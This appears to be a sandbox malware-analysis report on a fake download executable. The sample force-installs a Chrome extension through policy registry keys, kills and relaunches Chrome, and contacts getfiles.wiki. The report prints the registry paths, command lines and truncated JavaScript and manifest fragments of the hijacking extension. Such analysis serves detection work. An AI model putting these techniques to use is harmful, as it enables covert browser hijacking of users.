Jan 3, 2025 19:56:50.463033915 CET	1.1.1.1	192.168.2.24	0x9f43	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 3, 2025 19:56:50.463033915 CET	1.1.1.1	192.168.2.24	0x9f43	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Jan 3, 2025 19:56:58.217159986 CET	1.1.1.1	192.168.2.24	0x1b77	No error (0)	getfiles.wiki		185.107.56.193	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	13:56:55
Start date:	03/01/2025
Path:	C:\Users\user\Desktop\Your File Is Ready To Download.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Your File Is Ready To Download.exe"
Imagebase:	0x910000
File size:	203'120 bytes
MD5 hash:	C350EACFE1E1E28295EB961AF91E70F8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:56:56
Start date:	03/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" https://getfiles.wiki/welcome.php
Imagebase:	0x7ff6c5120000
File size:	3'001'952 bytes
MD5 hash:	290DF23002E9B52249B5549F0C668A86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:56:56
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	/IM chrome.exe
Imagebase:	0xfe0000
File size:	76'288 bytes
MD5 hash:	0696086690D7B673C64A7CAD8CD58F7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:56:56
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6038b0000
File size:	1'040'384 bytes
MD5 hash:	9698384842DA735D80D278A427A229AB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:56:56
Start date:	03/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1744,i,7731954280138320049,15909373391771842878,262144 --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2152 /prefetch:11
Imagebase:	0x7ff6c5120000
File size:	3'001'952 bytes
MD5 hash:	290DF23002E9B52249B5549F0C668A86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	13:56:59
Start date:	03/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble
Imagebase:	0x7ff6c5120000
File size:	3'001'952 bytes
MD5 hash:	290DF23002E9B52249B5549F0C668A86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	13:57:00
Start date:	03/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1920,i,3844859104028223706,11650728144148366790,262144 --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2228 /prefetch:11
Imagebase:	0x7ff6c5120000
File size:	3'001'952 bytes
MD5 hash:	290DF23002E9B52249B5549F0C668A86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	13:57:10
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	/F /IM chrome.exe /T
Imagebase:	0xfe0000
File size:	76'288 bytes
MD5 hash:	0696086690D7B673C64A7CAD8CD58F7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	13:57:10
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6038b0000
File size:	1'040'384 bytes
MD5 hash:	9698384842DA735D80D278A427A229AB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.5%
Total number of Nodes:	1382
Total number of Limit Nodes:	32

Executed Functions

Function 00911780 Relevance: 132.1, APIs: 32, Strings: 43, Instructions: 837COMMON

Download Yara Rule

Strings

jdejdmchbgaciegdmifmnkopbdbfhcfb, xrefs: 00911B83
ExtensionInstallAllowlist, xrefs: 00911A93
%s\chrome.crx, xrefs: 00911E61
jdejdmchbgaciegdmifmnkopbdbfhcfb, xrefs: 0091207E
ExtensionInstallForcelist, xrefs: 00911AA5
SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist, xrefs: 009119A4
SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb, xrefs: 00911EE3
Default, xrefs: 00911C6B
%s\Google\Chrome\User Data\%s\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb\1.0_0\src\jquery-3.5.1.min.js, xrefs: 0091200D
1.0, xrefs: 00911EF7
SOFTWARE\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb, xrefs: 00911ADC
1.0, xrefs: 00911EB9
version, xrefs: 00911EFC
SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist, xrefs: 00911A09
/IM chrome.exe, xrefs: 00911F1C
C:\Program Files, xrefs: 009118E9, 009118F6, 00911959
https://getfiles.wiki/welcome.php, xrefs: 00911BB0
SOFTWARE\WOW6432Node\Policies\Google\Chrome\ExtensionInstallForcelist, xrefs: 009120A1
SOFTWARE\Google\Chrome\Extensions, xrefs: 00911B5A
Profile , xrefs: 00911D0C
SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist, xrefs: 00912088
SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb, xrefs: 00911F01
jdejdmchbgaciegdmifmnkopbdbfhcfb, xrefs: 00912097
/F /IM chrome.exe /T, xrefs: 009120CC
%s\ServiceApp\apps-helper, xrefs: 00911E41
SOFTWARE\Policies\Google\Chrome, xrefs: 00911A6A
version, xrefs: 00911B1D
--profile-directory="%s" --no-startup-window --load-extension="%s" --hide-crash-restore-bubble, xrefs: 00911F84
%s\Google\Chrome\Application\chrome.exe, xrefs: 0091195E
jdejdmchbgaciegdmifmnkopbdbfhcfb, xrefs: 00911E7B
open, xrefs: 00911BBC
%s\Google\Chrome\User Data\*.*, xrefs: 00911BF0, 00911BEF
open, xrefs: 00911FB0
path, xrefs: 00911EA0
path, xrefs: 00911B06
version, xrefs: 00911EBE
SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist, xrefs: 00911E85
SOFTWARE\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb, xrefs: 00911EC3
============================, xrefs: 009117BC
%s\Google\Chrome\User Data\Default\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb, xrefs: 00911C37
path, xrefs: 00911EDE
%s\Google\Chrome\User Data\%s\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb, xrefs: 00911D3B
SOFTWARE\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb, xrefs: 00911EA5

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID:
String ID: --profile-directory="%s" --no-startup-window --load-extension="%s" --hide-crash-restore-bubble$ /F /IM chrome.exe /T$ /IM chrome.exe$ https://getfiles.wiki/welcome.php$%s\Google\Chrome\Application\chrome.exe$%s\Google\Chrome\User Data\%s\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb$%s\Google\Chrome\User Data\%s\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb\1.0_0\src\jquery-3.5.1.min.js$%s\Google\Chrome\User Data\*.*$%s\Google\Chrome\User Data\Default\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb$%s\ServiceApp\apps-helper$%s\chrome.crx$1.0$1.0$============================$C:\Program Files$Default$ExtensionInstallAllowlist$ExtensionInstallForcelist$Profile $SOFTWARE\Google\Chrome\Extensions$SOFTWARE\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb$SOFTWARE\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb$SOFTWARE\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb$SOFTWARE\Policies\Google\Chrome$SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist$SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist$SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist$SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist$SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb$SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb$SOFTWARE\WOW6432Node\Policies\Google\Chrome\ExtensionInstallForcelist$jdejdmchbgaciegdmifmnkopbdbfhcfb$jdejdmchbgaciegdmifmnkopbdbfhcfb$jdejdmchbgaciegdmifmnkopbdbfhcfb$jdejdmchbgaciegdmifmnkopbdbfhcfb$open$open$path$path$path$version$version$version
API String ID: 0-23166947
Opcode ID: 0138c68e91c83665595c3cdcfc068b388b69287fa27fbc2c111d3d9919f7c60b
Instruction ID: eecad149a296eac2eae7d62f068ccc093be2e9b45f5f6f062a5772ffd3cbc45d
Opcode Fuzzy Hash: 0138c68e91c83665595c3cdcfc068b388b69287fa27fbc2c111d3d9919f7c60b
Instruction Fuzzy Hash: B26214B5B4821DBBCB35AB649C49AECB77CEF64720F0447C9E629961E1E7704EC0CA11

Function 00911050 Relevance: 64.9, APIs: 18, Strings: 19, Instructions: 161
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KERNEL32.dll), ref: 0091105B
GetProcAddress.KERNEL32(?,LoadLibraryW), ref: 00911072
GetProcAddress.KERNEL32(?,CreateProcessW), ref: 00911086

Strings

RegCloseKey, xrefs: 0091118A
@upu, xrefs: 009110A5
RegCreateKeyExW, xrefs: 00911158
ShellExecuteW, xrefs: 009111D9
CreateFileW, xrefs: 009110AF
CreateDirectoryW, xrefs: 00911096
RegDeleteValueW, xrefs: 0091119E
WriteFile, xrefs: 009110C8
KERNEL32.dll, xrefs: 00911056
GetExitCodeProcess, xrefs: 009110E1
RegDeleteKeyW, xrefs: 009111B2
ADVAPI32.dll, xrefs: 0091112C
CreateProcessW, xrefs: 0091107D
CopyFileW, xrefs: 009110FA
RegOpenKeyExW, xrefs: 0091113F
RegSetValueExW, xrefs: 00911171
GetModuleFileNameW, xrefs: 00911113
LoadLibraryW, xrefs: 00911069
SHELL32.dll, xrefs: 009111C6

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: @upu$ADVAPI32.dll$CopyFileW$CreateDirectoryW$CreateFileW$CreateProcessW$GetExitCodeProcess$GetModuleFileNameW$KERNEL32.dll$LoadLibraryW$RegCloseKey$RegCreateKeyExW$RegDeleteKeyW$RegDeleteValueW$RegOpenKeyExW$RegSetValueExW$SHELL32.dll$ShellExecuteW$WriteFile
API String ID: 667068680-1921577586
Opcode ID: 037d37f7a4dfdcb85655992cad360fb4a972d99f765459033dff44d99c52dcdb
Instruction ID: a70f45b9f13dd4b53d3a09b6105b99f42d21a378802ea02c0957a0fb65b77908
Opcode Fuzzy Hash: 037d37f7a4dfdcb85655992cad360fb4a972d99f765459033dff44d99c52dcdb
Instruction Fuzzy Hash: FE51AF75F1834CBBDB208BB4AD488EEBBB6AA493747004745EB31972D8D7708981DF15

Function 00911480 Relevance: 42.3, APIs: 14, Strings: 10, Instructions: 289
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

{"name": "Apps","description": "","version": "1.0","manifest_version": 3,"background": {"service_worker": "service.js","type": "module"},"permissions": ["tabs", "scripting", "management", "background"],"host_permissions": ["chro, xrefs: 00911564
%s\ServiceApp\apps-helper\manifest.json, xrefs: 00911505, 00911504
%s\ServiceApp, xrefs: 0091149E
%s\ServiceApp\apps-helper\web.js, xrefs: 0091163A
@upu, xrefs: 009114C0, 009114F3
%s\ServiceApp\apps-helper, xrefs: 009114D2, 009114D1
chrome.management.onInstalled.addListener(info => {if (info.id != 'jdejdmchbgaciegdmifmnkopbdbfhcfb') return;setTimeout(() => {chrome.tabs.create({ url: 'chrome://policy' }, tab => {chrome.scripting.executeScript({target: { tabId: tab.id, xrefs: 009115FF
addEventListener('load', () => {if (location.host !== 'policy') return;const reload = () => {const button = document.querySelector('#reload-policies');if (button) {button.click();setTimeout(close, 200);} else {setTimeout(re, xrefs: 00911699
%s\ServiceApp\apps-helper\service.js, xrefs: 009115A1, 009115A0
%s\ServiceApp\apps-helper\chrome.crx, xrefs: 009116D5, 009116D4

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID:
String ID: %s\ServiceApp$%s\ServiceApp\apps-helper$%s\ServiceApp\apps-helper\chrome.crx$%s\ServiceApp\apps-helper\manifest.json$%s\ServiceApp\apps-helper\service.js$%s\ServiceApp\apps-helper\web.js$@upu$addEventListener('load', () => {if (location.host !== 'policy') return;const reload = () => {const button = document.querySelector('#reload-policies');if (button) {button.click();setTimeout(close, 200);} else {setTimeout(re$chrome.management.onInstalled.addListener(info => {if (info.id != 'jdejdmchbgaciegdmifmnkopbdbfhcfb') return;setTimeout(() => {chrome.tabs.create({ url: 'chrome://policy' }, tab => {chrome.scripting.executeScript({target: { tabId: tab.id${"name": "Apps","description": "","version": "1.0","manifest_version": 3,"background": {"service_worker": "service.js","type": "module"},"permissions": ["tabs", "scripting", "management", "background"],"host_permissions": ["chro
API String ID: 0-2288896630
Opcode ID: 4a73d55601b1f191e2edc18343b53b1f6dc0e4cd9fb5c7ba66548dd939ebfe2d
Instruction ID: 4a615f80d823e3eec9fd53b731d43252d79519dd820fb78c2a4eda89fccda30a
Opcode Fuzzy Hash: 4a73d55601b1f191e2edc18343b53b1f6dc0e4cd9fb5c7ba66548dd939ebfe2d
Instruction Fuzzy Hash: 81A1E570B9830CBBDB3097649C4AFE977296B54B20F084B84F335691E2DA715DC4DB25

Function 00911330 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 114
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00911362
CreateProcessW.KERNELBASE(c:\windows\system32\taskkill.exe,?,00000000,00000000,00000000,08000020,00000000,00000000,00000044,00000000), ref: 0091139C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 009113CB
GetExitCodeProcess.KERNELBASE(00000000,?), ref: 009113D9
CloseHandle.KERNEL32(00000000), ref: 009113EB
CloseHandle.KERNEL32(?), ref: 009113FA

Strings

D, xrefs: 0091136F
c:\windows\system32\taskkill.exe, xrefs: 00911397

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateExitObjectSingleWait_memset
String ID: D$c:\windows\system32\taskkill.exe
API String ID: 3666309416-2254422676
Opcode ID: 79cd08228f6de8cf5740e7ce2d3dc67b4e20dd907d7fbcbb579f4b960bc582cd
Instruction ID: 4af240fb119857bd02cb65c7a003735611b6424e22e1c0e8afeda974f020dc07
Opcode Fuzzy Hash: 79cd08228f6de8cf5740e7ce2d3dc67b4e20dd907d7fbcbb579f4b960bc582cd
Instruction Fuzzy Hash: 73412571B0828DBBDB209BF88C057ED7B78AB11724F08411AE7709A5EAD73058C2C712

Function 009114F1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00911536

Strings

%s\ServiceApp\apps-helper\manifest.json, xrefs: 00911505
@upu, xrefs: 009114F4

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID: CreateFile
String ID: %s\ServiceApp\apps-helper\manifest.json$@upu
API String ID: 823142352-3383513365
Opcode ID: f3102dd0dd8489205adb162d1ccdc1bd9d18f1ce37725d8d3dd96e023a7bcda4
Instruction ID: 9a312b1c6cd649241024de61e8914b167ceb3abad8768cf52a1e6ef9f55456d9
Opcode Fuzzy Hash: f3102dd0dd8489205adb162d1ccdc1bd9d18f1ce37725d8d3dd96e023a7bcda4
Instruction Fuzzy Hash: 8BF024B094D3896BDB3147284C4A39C7B74AF11B30F0A0BC0A261A55E3E23048C4DB22

Function 00911270 Relevance: 4.6, APIs: 3, Instructions: 79
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,000F003F,?,?,?), ref: 0091129F
RegSetValueExW.KERNELBASE(?,?,00000000,00000001,00000002,?), ref: 009112F9
RegCloseKey.KERNELBASE(?), ref: 00911310

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 912b25a44995b457eec1c7436415c5eb8db19b01d383c40ba6b418eac2350e65
Instruction ID: 9b4b130768fb0f2e3fb5dac149e96b14910c70adfc40069597f667c30cd86bea
Opcode Fuzzy Hash: 912b25a44995b457eec1c7436415c5eb8db19b01d383c40ba6b418eac2350e65
Instruction Fuzzy Hash: D0216F75A0020DBFCF20DFE8C845AEEB7B8EF59310F144649FA14EB291D6719981CBA1

Function 0091198D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist,00000000,000F003F,?), ref: 009119AE

Strings

SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist, xrefs: 009119A4

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID: Open
String ID: SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist
API String ID: 71445658-3928242555
Opcode ID: 4c6673b05172108a67ef49f1b1d36bdac816f95b74545700a5f6fe773a22fd96
Instruction ID: 68be019abae15b6449669d17af76b77c743428375b52ab8c663ac004fd385000
Opcode Fuzzy Hash: 4c6673b05172108a67ef49f1b1d36bdac816f95b74545700a5f6fe773a22fd96
Instruction Fuzzy Hash: EDE0D83050436BABC3219B605C5ABF8BA246F52711F188B85E224151E3C76009C0C696

Function 009115AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 009115D2

Strings

pu, xrefs: 009115D2

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID: CreateFile
String ID: pu
API String ID: 823142352-239814663
Opcode ID: 5a8ae33256c79a750b5fb093425a3824e0c777594e8c02a681cee802306f055a
Instruction ID: 72a715f5ae2c24f4f3d97b8417feef68ea1d1200c442586a24e03918764c12d0
Opcode Fuzzy Hash: 5a8ae33256c79a750b5fb093425a3824e0c777594e8c02a681cee802306f055a
Instruction Fuzzy Hash: 96E04FB045A2456EDB258B708C9DB99BB706F12320F044BC5F1319A2E3DA714485CB55

Function 00911AD3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb,00000000,000F003F,?), ref: 00911AE6

Strings

SOFTWARE\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb, xrefs: 00911ADC

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID: Open
String ID: SOFTWARE\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb
API String ID: 71445658-2709651783
Opcode ID: 7ed379632d815ae99db8a97dcf27fd77424e6db7d69cf0e369c0cc717e474ccd
Instruction ID: 0b8cbd543ef007495a7afaa0881316d2f60f409c17a740ebe8db51603bf4fb1d
Opcode Fuzzy Hash: 7ed379632d815ae99db8a97dcf27fd77424e6db7d69cf0e369c0cc717e474ccd
Instruction Fuzzy Hash: EBE0CD3074815BBFD7254B65484A494BE386F133327184786D631950F6E65004C1C741

Function 00911B39 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Google\Chrome\Extensions,00000000,000F003F,?), ref: 00911B64

Strings

SOFTWARE\Google\Chrome\Extensions, xrefs: 00911B5A

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID: Open
String ID: SOFTWARE\Google\Chrome\Extensions
API String ID: 71445658-3566514512
Opcode ID: 102c3ea8f3df3f9e49fca1761528333c96e6af319613dca72547c753936d8484
Instruction ID: 27d4b7d23906562ffcb1cfdc7db51c3f7088cf16795019bbf5c186cbf6cf491b
Opcode Fuzzy Hash: 102c3ea8f3df3f9e49fca1761528333c96e6af319613dca72547c753936d8484
Instruction Fuzzy Hash: C1E0C2307D832D76CB344B549C0EBB8F26CAB21721F040158F325684E9EF200AC0CA20

Function 00911A8B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14registryCOMMON

Download Yara Rule

APIs

RegDeleteKeyW.ADVAPI32(?,ExtensionInstallAllowlist), ref: 00911A9F
RegDeleteKeyW.ADVAPI32(?,ExtensionInstallForcelist), ref: 00911AB1

Strings

ExtensionInstallForcelist, xrefs: 00911AA5

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID: Delete
String ID: ExtensionInstallForcelist
API String ID: 1035893169-3350561883
Opcode ID: 258b3860957b5b028e0e9cd176acf5ef96c64507181a50602e626ed2847b817d
